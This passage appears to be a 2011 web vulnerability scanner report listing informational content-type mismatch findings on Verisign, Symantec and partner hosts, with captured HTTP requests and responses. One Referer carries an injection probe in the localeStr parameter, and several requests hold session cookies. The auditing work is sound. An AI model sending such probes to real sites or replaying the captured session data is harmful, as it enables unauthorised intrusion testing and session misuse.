Cache-Control: max-age=2592000, public
Age: 13
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 1558

/*******************************************
** Header functions **
*******************************************/
//----------------------------------------//
//Load Defaults when DOM i
...[SNIP]...

23.12. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/header/js/jquery.autocomplete.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.13. https://cdn.verisign.com/authweb/global/assets/home/js/home.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/home/js/home.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/home/js/home.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.14. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/global-preload.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 69230
Expires: Sun, 09 Oct 2011 02:24:38 GMT
Content-Length: 135518

// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js
/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the M
...[SNIP]...

23.15. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/google-analytics.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 471

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.com']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElemen
...[SNIP]...

23.16. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.boxshadow.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:27 GMT
Content-Length: 1538

/* **
* jquery-boxshadow.js
*
* $(object).boxshadow({
* hOffset : 3,
* vOffset : 3,
* shadowblur : 3,
* color : '#808080'
* })
*
* If you are using this with IE, you should s
...[SNIP]...

23.17. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.cacheimage.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.18. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.hover_intent.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.19. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/oo-engine.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 1154

/* OnlineOpinion (S3tS v3.1) */

/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

var custom_var,
...[SNIP]...

23.20. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.21. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/shared.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/shared.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.22. https://cert.webtrust.org/ViewSeal previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://cert.webtrust.org
Path:	/ViewSeal

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ViewSeal HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.23. http://com-verisign.netmng.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://com-verisign.netmng.com
Path:	/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.24. https://fileconnect.symantec.com/images/Sigstand.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://fileconnect.symantec.com
Path:	/images/Sigstand.jpg

Issue detail

The response contains the following Content-type statement:

Content-type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/Sigstand.jpg HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:03:56 GMT
Content-length: 2534
Content-type: image/jpeg
Last-Modified: Sat, 21 May 2011 05:26:42 GMT
Accept-Ranges: bytes

GIF89a..%..........ddd........k..............................oR.........VCCC...]]]$$$.................3...222..,...<<<......vvv......XXX+++...............mmmppp.....{UUU...yyy.....D.........jjj..&....
...[SNIP]...

23.25. http://free.pctools.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://free.pctools.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: free.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2; __utma=9079138.240734855.1315623957.1315623957.1315623957.1; __utmb=9079138.1.10.1315623957; __utmc=9079138; __utmz=9079138.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=1.1056361608.1315623957.1315623957.1315623957.1; __utmb=1.0.10.1315623957; __utmc=1; __utmz=1.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 07 Dec 2010 03:15:40 GMT
ETag: "738b5b-57e-496c96b526f00"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Date: Fri, 09 Sep 2011 22:05:57 GMT
Connection: close

..............h.......(....... .................................\...............6.......M...G...H...[.......5.......U...........X...J...3...k...i...W...O.......?...i...W...|...............K...K.......
...[SNIP]...

23.26. http://gs.instantservice.com/geoipAPI.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://gs.instantservice.com
Path:	/geoipAPI.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /geoipAPI.js?src=ii3&ts=1315621724 HTTP/1.1
Host: gs.instantservice.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:14 GMT
Server: Apache
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 355
Connection: close
Content-Type: text/javascript; charset=utf-8

isgeoipapi_continent_code = "NA";isgeoipapi_country_code = "US";isgeoipapi_country_name = "United States";isgeoipapi_region = "TX";isgeoipapi_city = "Dallas";isgeoipapi_dma_code = "623";isgeoipapi_are
...[SNIP]...

23.27. https://idprotect.verisign.com/common/scripts/dlText.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://idprotect.verisign.com
Path:	/common/scripts/dlText.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

Response

23.28. https://idprotect.verisign.com/imageapp.v previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://idprotect.verisign.com
Path:	/imageapp.v

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /imageapp.v?Image=tmobile_de HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/wheretouse.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:51:34 GMT
Content-Disposition: filename=getimage.jpeg
Content-Type: image/jpeg
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 491

GIF89a..2........................................o.._..`..P..@..?..0.. z..q..g..............................!.......,......2.... .di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.......n..m.:.v
...[SNIP]...

23.29. https://idprotect.verisign.com/membersites.v previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://idprotect.verisign.com
Path:	/membersites.v

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /membersites.v?DATA={REGION:ALL,CATEGORY:FEATURED_ONLY,ACCOUNT_TYPE:ALL} HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://idprotect.verisign.com/wheretouse.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:50:53 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 7124
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

[{"id":27323,"logoImage":null,"isPartner":0,"description":"Merrill Lynch","isFeatured":1,"name":"merrilllynch","hasImageLogo":1,"displayOrder":1,"webLink":"http://www.ml.com/","code":"merrilllynch","b
...[SNIP]...

23.30. https://knowledge.verisign.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://knowledge.verisign.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

23.31. http://mbox3.offermatica.com/m2/verisign/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

23.32. http://partnerlocator.symantec.com/public/product_finder previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://partnerlocator.symantec.com
Path:	/public/product_finder

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /public/product_finder HTTP/1.1
Host: partnerlocator.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:45:58 GMT
Content-Type: text/html
Connection: close
Content-Length: 34

<h1>500 Internal Server Error</h1>

23.33. http://partnerlocator.symantec.com/public/pulldown_list previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://partnerlocator.symantec.com
Path:	/public/pulldown_list

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /public/pulldown_list;plist=country;search_term=usa;country=;locale=en-us;container=pulldown_list;value_id=country;text_id=country_name HTTP/1.1
Host: partnerlocator.symantec.com
Proxy-Connection: keep-alive
Referer: http://partnerlocator.symantec.com/public/search
X-Prototype-Version: 1.5.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bhide_initial_text_new%25252528%25252527country_name%25252527%2525252C%25252527country%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:37:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Size: 20
Content-Length: 20

No Matching Partners

23.34. http://player.ooyala.com/info/primary/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://player.ooyala.com
Path:	/info/primary/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

23.35. http://player.ooyala.com/sas/authorized previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://player.ooyala.com
Path:	/sas/authorized

Issue detail

The response contains the following Content-type statement:

Content-Type: text/xml

The response states that it contains XML. However, it actually appears to contain script.

Request

Response

23.36. http://query.verisign.com/cluster previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://query.verisign.com
Path:	/cluster

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

POST /cluster?coutput=json&q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108&access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1 HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
Content-Length: 0
Origin: http://query.verisign.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Type: text/javascript; charset=utf-8
Cache-Control: max-age=900
Expires: Fri, 09 Sep 2011 21:41:10 GMT
Content-Length: 3685

{"clusters":
[
],
"documents":
[
               {
                   "url": "https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR",
                   "title": "Ve
...[SNIP]...

23.37. http://sales.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=71097838 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315578244934

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71097838
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1efe"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Fri, 09 Sep 2011 21:26:51 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

23.38. https://seal.verisign.com/getseal previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://seal.verisign.com
Path:	/getseal

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /getseal HTTP/1.1
Host: seal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Fri, 09 Sep 2011 21:46:24 GMT
Connection: close

23.39. http://sr2.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=71097838 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/store/resources/index.jsp?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=71097838
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:27d6"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Fri, 09 Sep 2011 21:31:14 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

23.40. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.symantec.com
Path:	/connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 05 Oct 2010 02:54:35 GMT
ETag: "a680e3-47e-491d5c7eb70c0"
Content-Type: text/plain; charset=UTF-8
X-Varnish: 312037258
Vary: Accept-Encoding
Content-Length: 1150
Cache-Control: max-age=18988
Date: Fri, 09 Sep 2011 21:34:12 GMT
